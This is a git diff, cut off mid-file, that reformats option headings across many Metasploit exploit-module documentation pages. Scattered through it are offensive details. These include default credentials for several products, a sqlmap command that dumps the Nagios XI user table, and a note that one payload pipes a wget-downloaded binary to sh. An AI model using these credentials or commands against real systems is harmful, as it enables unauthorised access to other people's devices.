diff --git a/documentation/modules/exploit/aix/local/xorg_x11_server.md b/documentation/modules/exploit/aix/local/xorg_x11_server.md index a3cc00fc1e80b..bc6e3e6041e7c 100644 --- a/documentation/modules/exploit/aix/local/xorg_x11_server.md +++ b/documentation/modules/exploit/aix/local/xorg_x11_server.md @@ -34,11 +34,11 @@ This table lists all vulnerable Xorg versions: ## Options -**SESSION** +### SESSION Which session to use, which can be viewed with `sessions` -**WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/android/local/janus.md b/documentation/modules/exploit/android/local/janus.md index 1c563940ba24e..be17e60ac2241 100644 --- a/documentation/modules/exploit/android/local/janus.md +++ b/documentation/modules/exploit/android/local/janus.md @@ -77,7 +77,7 @@ Number of signers: 1 ## Options - **PACKAGE** +### PACKAGE Select a package to infect. A list of packages can be obtained by running `app_list` on meterpreter. Using `ALL` will loop through all packages and attempt to exploit them until successful. This can take a while, and cause lots of data to be diff --git a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md index eebb7e1f0e305..18166fbba422b 100644 --- a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md @@ -34,11 +34,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md b/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md index 1acc4eba10675..0c5301fe5a952 100644 --- a/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md 
+++ b/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md @@ -31,7 +31,7 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` diff --git a/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md index 914f862489a0a..7b43074281168 100644 --- a/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md +++ b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md @@ -25,7 +25,7 @@ ## Options - **ASUSWRTPORT** +### ASUSWRTPORT AsusWRT HTTP portal port (default: `80`) diff --git a/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md b/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md index 6d74786624add..a4a5247ba6667 100644 --- a/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md +++ b/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md @@ -24,12 +24,22 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862 ## Options -**USERNAME** The username for Cisco Firepower Management console. +### USERNAME -**PASSWORD** The password for Cisco Firepower Management console. +The username for Cisco Firepower Management console. -**NEWSSHUSER** The SSH account to create. By default, this is random. +### PASSWORD -**NEWSSHPASS** The SSH password for the new account. By default, this is also random. +The password for Cisco Firepower Management console. -**SSHPORT** In case for some reason, the SSH changed, otherwise this is 22 by default. +### NEWSSHUSER + +The SSH account to create. By default, this is random. + +### NEWSSHPASS + +The SSH password for the new account. By default, this is also random. + +### SSHPORT + +In case for some reason, the SSH changed, otherwise this is 22 by default. 
diff --git a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md index 37d95b29bb9a3..93c564e5401d5 100644 --- a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md +++ b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md @@ -39,30 +39,30 @@ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-2 ## Options -**RHOSTS** +### RHOSTS Configure the remote vulnerable system. -**RPORT** +### RPORT Configure the TCP port of the HTTP/HTTPS management web interface. -**USE_SSL** +### USE_SSL This flag controls whether the remote management web interface is accessible via HTTPS or not. Should be false for HTTP and true for HTTPS. -**PAYLOAD** +### PAYLOAD Configure the Metasploit payload that you want to stage. Must be for MIPS64 arch. Set payload Options accordingly. -**SRVHOST** +### SRVHOST The module stages the payload via a web server. This is the binding interface IP. Default can be set to 0.0.0.0. -**HTTPDelay** +### HTTPDelay This configures how long the module should wait for the incoming HTTP connection to the HTTP stager. diff --git a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md index 5eb4265616ae7..6a2bf4de967b1 100644 --- a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md +++ b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md 
@@ -75,8 +75,10 @@ ddev launch The module has the following option: -- **ASSET_ID**: This option is required for older versions of Craft CMS, particularly in the 3.x series. - It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability. +### ASSET_ID + +This option is required for older versions of Craft CMS, particularly in the 3.x series. +It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability. For example, if you are targeting a Craft CMS version from the `>= 3.0.0`, `< 3.9.14`, make sure to specify the correct `ASSET_ID`. This is necessary for successful exploitation when dealing with these versions. diff --git a/documentation/modules/exploit/linux/http/goahead_ldpreload.md b/documentation/modules/exploit/linux/http/goahead_ldpreload.md index e810d8accd95e..307f10f0ce240 100644 --- a/documentation/modules/exploit/linux/http/goahead_ldpreload.md +++ b/documentation/modules/exploit/linux/http/goahead_ldpreload.md @@ -30,7 +30,7 @@ gcc ./cgitest.c -o cgi-bin/cgitest ## Options - **TARGET_URI** +### TARGET_URI Optional. The full path to a CGI endpoint on the target server. diff --git a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md index 4674329af29f1..449b06bd7aae0 100644 --- a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md +++ b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md 
@@ -18,23 +18,23 @@ Tested on 2.7.18.0503. ## Options -**RPORT** +### RPORT Set this to the port for the REST API, usually 8081. -**WEBUI_PORT** +### WEBUI_PORT Set this to the port for the web UI, usually 8443. -**TOKEN** +### TOKEN Set this to the service token. Defaults to `AuroraSdnToken37`. -**USERNAME** +### USERNAME Set this to the service username. Defaults to `sdn`. -**PASSWORD** +### PASSWORD Set this to the service password. Defaults to `skyline`. diff --git a/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md index 29df881754224..d1899f0e164e5 100644 --- a/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md +++ b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md @@ -16,11 +16,11 @@ ## Options - **PASSWORD** +### PASSWORD Password is set at install. May be blank, 'admin', or 'ipfire'. - **CMD** +### CMD This is the command to run on the system. diff --git a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md index c6ead925f904c..0f76192655833 100644 --- a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md +++ b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md @@ -21,7 +21,7 @@ This module has been verified against: ## Options - **PASSWORD** +### PASSWORD Password is set at install. May be blank, 'admin', or 'ipfire'. @@ -45,4 +45,4 @@ This module has been verified against: uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid) whoami nobody - ``` \ No newline at end of file + ``` diff --git a/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md b/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md index f2d7902ff0a67..0f0370d3c6359 100644 --- a/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md +++ b/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md 
@@ -20,10 +20,10 @@ ## Options - **USERNAME** +### USERNAME Username of the administrative user you are authenticating to the web portal as. - **PASSWORD** +### PASSWORD Password for the administrative user you are authenticating to the web portal as. ## Scenarios diff --git a/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md b/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md index 3992497ed1815..f726854aa82b1 100644 --- a/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md +++ b/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md @@ -17,7 +17,7 @@ ## Options - **PASSWORD** +### PASSWORD Password is set at install. May be blank, 'admin', or 'ipfire'. @@ -44,4 +44,4 @@ uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid) whoami nobody - ``` \ No newline at end of file + ``` diff --git a/documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md b/documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md index 000be1999887f..b2cb5ed88b2f6 100644 --- a/documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md +++ b/documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md @@ -21,7 +21,7 @@ ## Options - **PAYLOAD** +### PAYLOAD The `generic` and `netcat` payload types are valid. diff --git a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md index 58d6ef26a38af..844c4ce578f65 100644 --- a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md +++ b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md 
@@ -30,11 +30,11 @@ anyway. ## Options - **USER_ID** +### USER_ID If you wish to exploit a particular ```USER_ID```, that can be specified here. Default is 1, which is most likely the admin account. - **API_TOKEN** +### API_TOKEN The SQLi included only works for MySQL, which should work in most cases. However, if you experience a different backend, you can enumerate the user table via sqlmap: ```sqlmap -u "http://[ip]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```. diff --git a/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md b/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md index d7c6c79322b00..3d7e5c86d98d4 100644 --- a/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md @@ -17,7 +17,7 @@ ## Options - **USERNAME** +### USERNAME The `USERNAME` option sets the username to authenticate the request with. The command injection will __not__ succeed if the username and password are not correct. @@ -25,7 +25,7 @@ your best bet will be to use the default username and password. - **PASSWORD** +### PASSWORD The `PASSWORD`options sets the password to authenticate the request with. The command injection will __not__ succeed if the username and password are not correct. diff --git a/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md b/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md index 334816b7b8ba8..ae4e33977b293 100644 --- a/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md +++ b/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md @@ -17,7 +17,7 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po ## Options - **PAYLOAD** +### PAYLOAD The valid payloads are `meterpreter` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh` 
diff --git a/documentation/modules/exploit/linux/http/op5_config_exec.md b/documentation/modules/exploit/linux/http/op5_config_exec.md index 4f0a713ff9fc4..ec1eb51ed261e 100644 --- a/documentation/modules/exploit/linux/http/op5_config_exec.md +++ b/documentation/modules/exploit/linux/http/op5_config_exec.md @@ -24,11 +24,11 @@ Just a few quick notes on setting up a vulnerable lab with this software. ## Options - **PASSWORD** +### PASSWORD Password is 'monitor' by default. - **USERNAME** +### USERNAME Documentation was unclear on this. Installing just the app, the username was 'monitor' by default. However it looks like if you @@ -60,4 +60,4 @@ Just a few quick notes on setting up a vulnerable lab with this software. monitor id uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0 - ``` \ No newline at end of file + ``` diff --git a/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md b/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md index 4d0e564ce6fb6..85b321e071a2e 100644 --- a/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md @@ -26,11 +26,11 @@ Launch metasploit and set the appropriate options: ## Options - **USERNAME** +### USERNAME The username for Pandora FMS. - **PASSWORD** +### PASSWORD The password for Pandora FMS. diff --git a/documentation/modules/exploit/linux/http/panos_readsessionvars.md b/documentation/modules/exploit/linux/http/panos_readsessionvars.md index 21b657746c08a..6d83b99290422 100644 --- a/documentation/modules/exploit/linux/http/panos_readsessionvars.md +++ b/documentation/modules/exploit/linux/http/panos_readsessionvars.md 
@@ -24,9 +24,9 @@ This VM is not generally available, but the specific disk image used was `PA-VM- ## Options -**CBHOST** The callback listener address if the default is not accurate (port forwarding, etc) +### CBHOST The callback listener address if the default is not accurate (port forwarding, etc) -**CBPORT** The callback listener port +### CBPORT The callback listener port ## Scenarios diff --git a/documentation/modules/exploit/linux/http/php_imap_open_rce.md b/documentation/modules/exploit/linux/http/php_imap_open_rce.md index 2115155f74ab8..bf2212004921a 100644 --- a/documentation/modules/exploit/linux/http/php_imap_open_rce.md +++ b/documentation/modules/exploit/linux/http/php_imap_open_rce.md @@ -312,7 +312,7 @@ Make sure `php-imap` is installed and enabled. Create `imap.php` with the follo ## Options - **TARGETURI** +### TARGETURI The URI for the target. This may change by target. Default is ` `. Prestashop should be the admin URI, similar to `/admin2769gx8k3`. diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md index 9cede0e79f042..141c1293e8143 100644 --- a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md @@ -21,7 +21,7 @@ Id Name ## Options -**SID** +### SID Set this to a valid administrator session ID. Typically retrieved using the `auxiliary/gather/pulse_secure_file_disclosure` module. diff --git a/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md b/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md index 7fa2b780b7e49..1ac4d39df087c 100644 --- a/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md +++ b/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md 
@@ -36,11 +36,11 @@ ## Options - **USERNAME** +### USERNAME Username for the application. (default: `admin`) - **PASSWORD** +### PASSWORD Password for the application. (default: `admin`) diff --git a/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md index 8b63cf55ec0e1..05433e1037a37 100644 --- a/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md +++ b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md @@ -32,15 +32,15 @@ ## Options - **HttpUsername** +### HttpUsername Username for HTTP basic auth which is set in the conf file(optional) - **HttpPassword** +### HttpPassword Password for HTTP basic auth which is set in the conf file(optional) - **TARGETURI** +### TARGETURI The path to the XML-RPC endpoint diff --git a/documentation/modules/exploit/linux/http/tiki_calendar_exec.md b/documentation/modules/exploit/linux/http/tiki_calendar_exec.md index 64f396536d06c..3ea2346a7a90b 100644 --- a/documentation/modules/exploit/linux/http/tiki_calendar_exec.md +++ b/documentation/modules/exploit/linux/http/tiki_calendar_exec.md @@ -66,7 +66,7 @@ vs ## Options - **PASSWORD** +### PASSWORD Password is set at first login. Default for admin is 'admin'. diff --git a/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md b/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md index a2d6f1b60bf0e..4ab523487e193 100644 --- a/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md +++ b/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md @@ -25,7 +25,9 @@ according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getti ## Options - **TARGETURI** : The URI of the Unraid application +### TARGETURI + +The URI of the Unraid application ## Scenarios 
diff --git a/documentation/modules/exploit/linux/http/wazuh_auth_rce_cve_2025_24016.md b/documentation/modules/exploit/linux/http/wazuh_auth_rce_cve_2025_24016.md index 9759f4a763333..1270542469e5d 100644 --- a/documentation/modules/exploit/linux/http/wazuh_auth_rce_cve_2025_24016.md +++ b/documentation/modules/exploit/linux/http/wazuh_auth_rce_cve_2025_24016.md @@ -277,7 +277,7 @@ the vulnerable code will not be triggered. you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings. ## Options -**API Credentials:** +### API Credentials: `API_PWD` Wazuh API password (MyS3cr37P450r.*-) `API_USER` Wazuh API user (wazuh-wui) diff --git a/documentation/modules/exploit/linux/http/webmin_backdoor.md b/documentation/modules/exploit/linux/http/webmin_backdoor.md index 687edb4575ad2..54845e9c2b60e 100644 --- a/documentation/modules/exploit/linux/http/webmin_backdoor.md +++ b/documentation/modules/exploit/linux/http/webmin_backdoor.md @@ -63,15 +63,15 @@ Id Name ## Options -**RPORT** +### RPORT Set this to the Webmin port. The default is 10000. -**TARGETURI** +### TARGETURI Set this to the Webmin base path. The default is `/`. -**ForceExploit** +### ForceExploit Set this to `true` to override the `check` result during exploitation. diff --git a/documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md b/documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md index 048bed1d83bed..780467797f186 100644 --- a/documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md +++ b/documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md @@ -22,7 +22,7 @@ ## Options - **PAYLOAD** +### PAYLOAD The `generic`,`netcat` and `openssl` payload types are valid. diff --git a/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md b/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md index a78a07d1c2a6a..87d760eff1831 100644 
--- a/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md +++ b/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md @@ -35,15 +35,15 @@ ## Options - **USERNAME** +### USERNAME Username for the new UID=0 user (default: random) - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md b/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md index 7fcff3830b1ce..758d296b33199 100644 --- a/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md +++ b/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **TIMEOUT** +### TIMEOUT Timeout for `sosreport` (seconds) (default: `600`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md index dfc67df761ac3..2b4f8456c5468 100644 --- a/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md +++ b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md @@ -40,19 +40,19 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **TIMEOUT** +### TIMEOUT Race timeout (seconds). (default: `600`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md index badf782bbaee4..a4fabe00c6f04 100644 
--- a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md +++ b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md @@ -43,15 +43,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md b/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md index 4ff8c0320361e..ce48db13d2869 100644 --- a/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md +++ b/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md @@ -32,11 +32,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md b/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md index 0fee4f44f721e..e8559eddf2d85 100644 --- a/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md +++ b/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md @@ -42,19 +42,19 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **SUID_EXECUTABLE** +### SUID_EXECUTABLE Path to a SUID executable compiled with ASan. (default: ``) - **SPRAY_SIZE** +### SPRAY_SIZE Number of PID symlinks to create. (default: `50`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) 
diff --git a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md index 23848c9dd50e7..9a5e20617ab13 100644 --- a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md +++ b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md @@ -45,11 +45,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/bpf_priv_esc.md b/documentation/modules/exploit/linux/local/bpf_priv_esc.md index 6109907adb2a6..8324b4cda90a2 100644 --- a/documentation/modules/exploit/linux/local/bpf_priv_esc.md +++ b/documentation/modules/exploit/linux/local/bpf_priv_esc.md @@ -53,15 +53,15 @@ There are a few requirements for this module to work: ## Options - **MAXWAIT** +### MAXWAIT The first stage of this priv esc can take ~35 seconds to execute. This is the timer on how long we should wait till we give up on the first stage finishing. Defaults to `120` (seconds) - **WritableDir** +### WritableDir A folder we can write files to. Defaults to `/tmp` - **COMPILE** +### COMPILE If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto` diff --git a/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md b/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md index dc521c59e2b09..250211e99f707 100644 --- a/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md +++ b/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md 
@@ -40,11 +40,11 @@ ## Options - **WritableDir** +### WritableDir A folder we can write files to. Defaults to `/tmp` - **COMPILE** +### COMPILE If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto` diff --git a/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md b/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md index c5e57b91cb71f..5864d8a62f2fd 100644 --- a/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md +++ b/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md @@ -35,10 +35,13 @@ compilation on target, False will upload a precompiled binary. AUTO will favor but will fall back to the precompiled option if a compiler cannot be found. ### WritableDir + This indicates the location where you would like the payload and exploit binary stored, as well as serving as a location to store the various files and directories created by the exploit itself. The default value is `/tmp` +## Scenarios + ### Ubuntu 20.04.0 x64 ``` @@ -91,9 +94,9 @@ The binaries used by this exploit `data/exploits/CVE-2021-3493/cve_2021_3493.x64 `data/exploits/CVE-2021-3493/cve_2021_3493.x64.elf` can and be used separately from metasploit. The parameters required are: ``` - // argv[1] = The payload or executable you wish to launch - // argv[2] = A directory to store the files and directories created when the exploit runs - // argv[3] = A random string that is used to create directory names. +// argv[1] = The payload or executable you wish to launch +// argv[2] = A directory to store the files and directories created when the exploit runs +// argv[3] = A random string that is used to create directory names. ``` ``` msfuser@ubuntu-18041:~$ id 
diff --git a/documentation/modules/exploit/linux/local/glibc_ld_audit_dso_load_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_ld_audit_dso_load_priv_esc.md index 30ef3eb2c3d29..f2a12d7e516ad 100644 --- a/documentation/modules/exploit/linux/local/glibc_ld_audit_dso_load_priv_esc.md +++ b/documentation/modules/exploit/linux/local/glibc_ld_audit_dso_load_priv_esc.md @@ -32,11 +32,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md index da4cb3318d09d..cc5e5b6b5c478 100644 --- a/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md +++ b/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md @@ -43,11 +43,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md index 12576f63e3dbd..692cc1a72a75c 100644 --- a/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md +++ b/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md @@ -31,15 +31,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md b/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md index 9fab3b0792dfb..4f89e6da7af93 100644 
--- a/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md +++ b/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md @@ -99,11 +99,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md index 933be480ed07d..908836f3a37a8 100644 --- a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md @@ -29,11 +29,11 @@ ## Options - **KTSUSS_PATH** +### KTSUSS_PATH Path to `ktsuss` executable (default: `/usr/bin/ktsuss`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md b/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md index 8532e6281d507..8ce80d541b6da 100644 --- a/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md +++ b/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md @@ -58,11 +58,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md b/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md index e455adf27714d..ef107c80325a3 100644 --- a/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md +++ b/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md 
@@ -48,19 +48,19 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **PASSWORD** +### PASSWORD Password for the current user. (default: blank) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md b/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md index 2fa286508c852..0b4d63081c19d 100644 --- a/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md +++ b/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md @@ -32,15 +32,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv4.md b/documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv4.md index 686f20afaa477..d5d36dbe0e287 100644 --- a/documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv4.md +++ b/documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv4.md @@ -34,15 +34,15 @@ This does not work against the following vulnerable systems. Additional work ma ## Options - **MAXWAIT** +### MAXWAIT The first stage of this priv esc can take ~35seconds to execute. This is the timer on how long we should wait till we give up on the first stage finishing. Defaults to 120 (seconds) - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp - **REEXPLOIT** +### REEXPLOIT When re-exploiting, no need to run desc (it 